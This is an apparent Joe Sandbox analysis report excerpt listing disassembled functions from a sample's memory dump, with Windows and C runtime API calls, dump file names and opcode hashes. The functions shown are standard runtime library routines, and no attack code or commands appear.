                                                                                                                                                                                                                                                  Function 00F73686 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000), ref: 00F7369D
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000,?,?,?,00F7271F,?), ref: 00F736A9
                                                                                                                                                                                                                                                    • Part of subcall function 00F7366F: CloseHandle.KERNEL32(FFFFFFFE,00F736B9,?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000,?,?), ref: 00F7367F
                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 00F736B9
                                                                                                                                                                                                                                                    • Part of subcall function 00F73631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F73660,00F73040,?,?,00F72198,?,?,00000000,?), ref: 00F73644
                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000,?), ref: 00F736CE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                                                                                                                                  • Opcode ID: 7600343d96cf7cbcfadc6a4d8b011323be3dce8e084e2842d37f7c7539e989d9
                                                                                                                                                                                                                                                  • Instruction ID: f5ca51e0338b9d00041cd7796d80c5cdc0057c86349d89a1316fcabd0ae4d597
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7600343d96cf7cbcfadc6a4d8b011323be3dce8e084e2842d37f7c7539e989d9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FF0AC3651425CBBCF626F95EC05D993F66FB087B1B448061FE1D96220D6328960FB92
                                                                                                                                                                                                                                                  Function 00F52D20 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SleepConditionVariableCS.KERNELBASE(?,00F52CBD,00000064), ref: 00F52D43
                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F52CBD,00000064,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52D4D
                                                                                                                                                                                                                                                  • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00F52CBD,00000064,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52D5E
                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00F8DD3C,?,00F52CBD,00000064,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52D65
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3269011525-0
                                                                                                                                                                                                                                                  • Opcode ID: adac9c210c07a0ec124efee90b6e29fa1af94c85e0af973fd1d756bd85735b26
                                                                                                                                                                                                                                                  • Instruction ID: e2d7ead1b0fd70ef689d82a66bbe3cec9c82fbd8f237ffe6eb7588f862aafd12
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: adac9c210c07a0ec124efee90b6e29fa1af94c85e0af973fd1d756bd85735b26
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DE0123355562CBBCB163B54EC08ADA7F39BF05B61B010051FA0A661B2D7615941BBD3
                                                                                                                                                                                                                                                  Function 00F3EC87 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F3EC8E
                                                                                                                                                                                                                                                    • Part of subcall function 00F3D87C: __EH_prolog3.LIBCMT ref: 00F3D883
                                                                                                                                                                                                                                                    • Part of subcall function 00F3D87C: std::_Lockit::_Lockit.LIBCPMT ref: 00F3D88D
                                                                                                                                                                                                                                                    • Part of subcall function 00F3D87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D8FE
                                                                                                                                                                                                                                                  • _Find_elem.LIBCPMT ref: 00F3EE8A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F3ECF6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                  • API String ID: 2544715827-2799312399
                                                                                                                                                                                                                                                  • Opcode ID: d3ed3ce00de6da83f4c1a4a2663802c2088fc254ec2b4527ae4029f96cb5b519
                                                                                                                                                                                                                                                  • Instruction ID: b28642ffa36305a222e5ac1d4080302da44ae99ce4763b21f33fb81c7f325061
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3ed3ce00de6da83f4c1a4a2663802c2088fc254ec2b4527ae4029f96cb5b519
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56C18F35E042889EDF25DBB8C8407ECBBB2AF55320F294069E8856B3C7C7749D85EB51
                                                                                                                                                                                                                                                  Function 00F462BE Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F462C8
                                                                                                                                                                                                                                                    • Part of subcall function 00F42D74: __EH_prolog3.LIBCMT ref: 00F42D7B
                                                                                                                                                                                                                                                    • Part of subcall function 00F42D74: std::_Lockit::_Lockit.LIBCPMT ref: 00F42D85
                                                                                                                                                                                                                                                    • Part of subcall function 00F42D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00F42DF6
                                                                                                                                                                                                                                                  • _Find_elem.LIBCPMT ref: 00F46502
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F4633F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                  • API String ID: 2544715827-2799312399
                                                                                                                                                                                                                                                  • Opcode ID: 028d0d592a0552ecc1357c9bc8303b4b20c0b78e03a9b4be12bb49d4cfdf7f21
                                                                                                                                                                                                                                                  • Instruction ID: 0fa03c27b7eaf24da48848d151da7b90cd2649181cb596d69bc7419f967b0e09
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 028d0d592a0552ecc1357c9bc8303b4b20c0b78e03a9b4be12bb49d4cfdf7f21
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40C19370E042588ADF25DF68C8417BCBFB1BF16314F588099DC89EB286DB349C85EB52
                                                                                                                                                                                                                                                  Function 00F46694 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F4669E
                                                                                                                                                                                                                                                    • Part of subcall function 00F3B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00F3B8DD
                                                                                                                                                                                                                                                    • Part of subcall function 00F3B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00F3B900
                                                                                                                                                                                                                                                    • Part of subcall function 00F3B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B928
                                                                                                                                                                                                                                                    • Part of subcall function 00F3B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B9B7
                                                                                                                                                                                                                                                  • _Find_elem.LIBCPMT ref: 00F468D8
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F46715
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                  • API String ID: 3042121994-2799312399
                                                                                                                                                                                                                                                  • Opcode ID: 01fcb1838a07d193ea8efc2226609bd96879ed11dc4e1a4ac537a093feb20da4
                                                                                                                                                                                                                                                  • Instruction ID: 0ac4b3745aa7a34a63068922a4012f1bac3030f2d7185fefaa1111a051f2357d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01fcb1838a07d193ea8efc2226609bd96879ed11dc4e1a4ac537a093feb20da4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25C18130E042588BDF25DF64C8517ACBFB2BF12314F548099DC89EB282DB788D85EB52
                                                                                                                                                                                                                                                  Function 00F61A6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00F61AFD
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                  • Opcode ID: dc2709dc918e9e76310cf78198a6a277b94c5e44d2fa57aa3803b8a9c77382eb
                                                                                                                                                                                                                                                  • Instruction ID: 5bf0a6f4a5c5073ab4dd1a24a1eaf3a91e0ed5e973ecf3bfe86dc056544bf0d1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc2709dc918e9e76310cf78198a6a277b94c5e44d2fa57aa3803b8a9c77382eb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97515C61E49205CACB117754CE1237E77A0FB40721F284958E0D5922A9FA3A8CD5BE87
                                                                                                                                                                                                                                                  Function 00F51E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                                  • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                  • API String ID: 3732870572-1956417402
                                                                                                                                                                                                                                                  • Opcode ID: 194e6d676b7896fc27234fba76c0aa4acfd93a59577db7df8cae8972153aa65d
                                                                                                                                                                                                                                                  • Instruction ID: b5b19d3837358485fb38d125b9cff2d672e449445ab5f4d94370fb687a996228
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 194e6d676b7896fc27234fba76c0aa4acfd93a59577db7df8cae8972153aa65d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC512230F04284ABDB258E6C88817BE7FF57F46362F14415AEE81D7281C374A94AE760
                                                                                                                                                                                                                                                  Function 00F3BD90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00F3BF6E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                  • API String ID: 118556049-2658103896
                                                                                                                                                                                                                                                  • Opcode ID: 3438cc7b02cfc3b665b2b0267e9f91f872c6f167da73d32409b4b5f45dda45e4
                                                                                                                                                                                                                                                  • Instruction ID: 4c0b20f3768451d753a935661439597ab0e5da1f14d57ad2ad47b8c33471abe5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3438cc7b02cfc3b665b2b0267e9f91f872c6f167da73d32409b4b5f45dda45e4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0951C3B1D007489FDB10DFA4CC41BEEBBB8FF05314F14426AE905AB241E774AA85DB91
                                                                                                                                                                                                                                                  Function 00F370A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                                                                                  • API String ID: 0-3019864461
                                                                                                                                                                                                                                                  • Opcode ID: b3799a7538d38035ffcc9266724ddf971b42c088090bd8e8fc43303388dd98c2
                                                                                                                                                                                                                                                  • Instruction ID: 5c8a718c065953b5729153001b842001ddaf64e9f65ce919f837978c3a0fc526
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3799a7538d38035ffcc9266724ddf971b42c088090bd8e8fc43303388dd98c2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7551C3B1A143049BDB24EFA4CC45BEEB7B5FF45724F10451DE801A7280DBB5A984EBA0
                                                                                                                                                                                                                                                  Function 00F4D4FA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F4D501
                                                                                                                                                                                                                                                  • _swprintf.LIBCMT ref: 00F4D573
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F42FC8: __EH_prolog3.LIBCMT ref: 00F42FCF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                                                                                                                                                                                                  • String ID: %.0Lf
                                                                                                                                                                                                                                                  • API String ID: 3050236999-1402515088
                                                                                                                                                                                                                                                  • Opcode ID: ca0ecb6e588e30e2991599fc05f69a9c8f4c55c6cc1ea41b832adc33e984b927
                                                                                                                                                                                                                                                  • Instruction ID: 54d6bc20734adda167996007d55e0a1b1a5fcf2dded29e76ef36e6e59942cb57
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca0ecb6e588e30e2991599fc05f69a9c8f4c55c6cc1ea41b832adc33e984b927
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74416972E00208ABCF05EFE4CC45AED7BB5FB08314F208449E845AB295EB799915EF91
                                                                                                                                                                                                                                                  Function 00F4D79E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F4D7A5
                                                                                                                                                                                                                                                  • _swprintf.LIBCMT ref: 00F4D817
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                                                                                                  • String ID: %.0Lf
                                                                                                                                                                                                                                                  • API String ID: 1487807907-1402515088
                                                                                                                                                                                                                                                  • Opcode ID: 2574dca44130a95da32d0e0b121ee40522de5db3cedffec1c75620d5430a54a2
                                                                                                                                                                                                                                                  • Instruction ID: 3d2d3c6906d21ae752078375b394561f0407c76a3086619004a5e655f3bd44ea
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2574dca44130a95da32d0e0b121ee40522de5db3cedffec1c75620d5430a54a2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D416972E00308ABCF05DFD4DC45AEE7BB5FB08310F208449E945AB295EB399915EF90
                                                                                                                                                                                                                                                  Function 00F51887 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F5188E
                                                                                                                                                                                                                                                  • _swprintf.LIBCMT ref: 00F51900
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                                                                                                  • String ID: %.0Lf
                                                                                                                                                                                                                                                  • API String ID: 1487807907-1402515088
                                                                                                                                                                                                                                                  • Opcode ID: 97fbf1766d9bd759b39759efd7bb179f76832808aac6d653b4868bea0191c611
                                                                                                                                                                                                                                                  • Instruction ID: e3fb1121e732e19040d1d7a2378361600c1cfd4eb7bac8e54304a6986067a845
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97fbf1766d9bd759b39759efd7bb179f76832808aac6d653b4868bea0191c611
